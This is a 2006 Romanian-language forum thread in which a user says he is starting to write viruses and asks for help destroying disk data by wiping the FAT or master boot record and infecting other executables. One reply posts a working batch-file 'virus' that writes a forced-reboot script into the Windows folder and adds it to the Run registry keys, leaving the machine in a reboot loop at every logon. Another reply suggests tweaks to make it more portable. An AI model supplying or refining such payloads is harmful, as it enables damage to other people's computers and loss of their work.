sau Inregistrare

• 2 Pagini +
  • 1
  • 2
  • Nu poti crea un subiect nou
  • Nu puteti raspunde pe acest topic

Hardcore programming: file table, MBR, assembler code Ma apuc de scris virusi! Need addition informations Evaluare topic: - - - - -

#1 Utilizator offline   dAImon 

• dragon
  • PipPipPipPipPipPip
  • Vezi blog
  • Grup: Silver Member
  • Inregistrat: 11-May 05

Scris 23 March 2006 - 07:43 PM

:flowers: Stiu, sa scrii virusi e ilegal. Spre vestea voastra, nu este! Este ilegal sa-i release in lume, dar sa scrii e complet legal. Rugamintea mea este sa-mi dati materiale pe aceasta tema, anume cum pot modfica, sterge informatii vitale de pe hdd.. Pana acuma am reusit sa conving Pascalul sa-mi detecteze folderul Windows si sa inceapa sa stearga din el.. dar e nasol ca un Windows se poate reinstala, in timp ce o partitie afectata de stergerea FATului sau a master boot recordului..

In plus, niscaiva informatii despre cum pot convinge un virus sa se multiplice si sa infecteze alte executabile? Sau poate un tutorial despre codul de asamblare? Orice material este binevenit. Si tineti minte: nu am invitat [e nimeni sa faca ceea ce fac eu :-P !
0

#2 Utilizator offline   Insomnia 

• Boboc
  • Pip
  • Grup: Members
  • Inregistrat: 28-March 06

Scris 28 March 2006 - 10:29 PM

pai se cam explica de ce nu ai zis nimanui nimic pana acum , pentru inca nu ai facut nimic ... :spiteful:

on second thot nici noi n-o sa te invatam cum nici tu nu ai sa faci la randul tau . Frumos ca lucrezi in Pascal , that's how I started , incearca si C , poti face mai multe magarii in C :crazy:
0

#3 Utilizator offline   Muad'Dib 

• Boboc
  • Pip
  • Grup: Full Members
  • Inregistrat: 01-April 06

Scris 01 April 2006 - 02:13 PM

daemonalexoiu, numai sa ai grija sa nu patesti ca mine, care am scris mai demult un "virus" in FoxPro, adica un mic program care sa suprascrie si apoi sa stearga anumite fisiere, iar cand l-am activat, respectivul s-a autosters instantaneu (adica am pierdut codul-sursa, munca de o saptamana). :crazy:
0

#4 Utilizator offline   bob32cc 

• Garoafa
  • PipPip
  • Inregistrat: 12-November 05

Scris 03 April 2006 - 08:17 PM

Apropo de virusi, stie cineva vreun cod sursa care sa stie sa stearga niste fisiere sau sa copieze foldere? De preferat in c++. Multumesc anticipat.
0

#5 Utilizator offline   dAImon 

• dragon
  • PipPipPipPipPipPip
  • Vezi blog

Scris 20 April 2006 - 06:58 PM

Eu pot sa-ti atasez exemple de cod in Pascal, si ti le convertesti tu dup-aia pentru C+, din ce stiu sunt cateva unelte ca sa aci chetia asta.. Sorry, la C nu ma stiu deloc.
0

#6 Utilizator offline   bob32cc 

• Garoafa
  • PipPip
  • Inregistrat: 12-November 05

Scris 23 April 2006 - 09:13 PM

Vezi postareaInsomnia, la Mar 28 2006, 10:29 PM, a spus:

pai se cam explica de ce nu ai zis nimanui nimic pana acum , pentru inca nu ai facut nimic ... :stars:

on second thot nici noi n-o sa te invatam cum nici tu nu ai sa faci la randul tau . Frumos ca lucrezi in Pascal , that's how I started , incearca si C , poti face mai multe magarii in C :)

Nu-i nevoie sa-i faci in C sau in cine stie ce altceva. Uite in "Virusel" .bat:

echo @echo off>c:\windows\hartlell.bat 
echo break off>>c:\windows\hartlell.bat 
echo shutdown -r -t 00 -f>>c:\windows\hartlell.bat 
echo end>>c:\windows\hartlell.bat 
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f 
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f

00=nr secunde

Cand utilizatorul aprinde calculatorul "viruselul" ii inchide windowsul instantaneu (00 secunde).
0

#7 Utilizator offline   work27 

• work
  • PipPipPip
  • Inregistrat: 25-April 05

Scris 27 April 2006 - 03:26 PM

fisierul tau bat poate fi folosit doar pt xp.
iar daca faci unul, trebuie sa te gandesti sa ruleze pe toate versiunile
sau poate windows-ul e pe partitia, D, de exemplu, sau in folderul, WINNT,
atunci poti modifica " c:\windows\ " in " %windir% "

sunt multe posibilitati.

eu de ex. folosesc vb poate face multe lucruri in background.
0

#8 Utilizator offline   assiris 

• Lalea
  • PipPipPip
  • Inregistrat: 25-December 05

Scris 06 May 2006 - 08:23 PM

Vad ca va preocupa enorm sa faceti virusi. Oare pentru a face un rau cuiva, chiar si o gluma de prost gust, merita sa va dati osteneala sa invatati un limbaj de programare?
Personal daca as gasi pe cineva care a facut un virus, care sa se raspindeasca si sa faca rau, nu stiu cum as reactiona, probabil nu m-as mai putea controla in actiunile mele. Pina acum am vazut ca nimeni de aici nu si-a pus problema de a face un antivirus destept.
Imagineaza-ti ca un medic chirurg sta 8-10 ore sa salveze viata unui om, si vine cineva si presara pe rana putin antrax, asa.... in gluma.... sa-i faca o poante medicului sau pacientului...
Sau dupa ce muncesti citeva zile si nopti la un proiect, iti bafa un destept un virusel, de 1 aprilie, deh! sa faca si el o gluma "buna" si cind sa predai si tu proiectul, iti sterge parte din programe sau iti pune HDD-ul la pamint. Sau poate habar nu aveti ce inseamna sa muncesti la un proiect in programare sau grafica, contabilitate sau mai stiu eu ce si din cauza unui "destept" sa vi se duca toata munca la ripa...
Parerea mea este ca acest topic e o gluma proasta in felul in care e pusa problema. :yahoo:
0

#9 Utilizator offline   the_white_raven 

• Ghiocel
  • Grup: Members
  • Inregistrat: 10-May 06

Scris 10 May 2006 - 07:38 PM

vreau si eu codul sursa in c++ care sa faca imaginea sa se deruleza intr-o anumita directie.
0

#10 Utilizator offline   dAImon 

• dragon
  • PipPipPipPipPipPip
  • Vezi blog

Scris 26 June 2006 - 03:03 PM

Ase. Punctu 1: incercati sa nu postati coduri sursa pe-aicea :spiteful: cereti pe PM sau e-mail.

Apoi, Assiris: sunt absolut sigur ca tu nu ai citit primul post. Zice acolo ca virusii e ok sa-i scrii, NU E OK sa ii lasi liberi sa se raspandeasca. A, si o corectie mica: eu nu am invatat limbaj de programare ca sa scriu virusi, dar vreau sa scriu virusi pentru ca stiu programare :lol2: destul de clar?

O sa incerc chestia aia cu fisierul batch, si revin cu un post.
0

Reclama

Impartaseste acest subiect:

• 2 Pagini +
  • 1
  • 2
  • Nu poti crea un subiect nou
  • Nu puteti raspunde pe acest topic

Subiecte similare Collapse

Topic Deschis de Replici Vizualizari
Replici noi Query PL/SQL criss5  1 2.486
Replici noi javascript TestWeb  2 2.569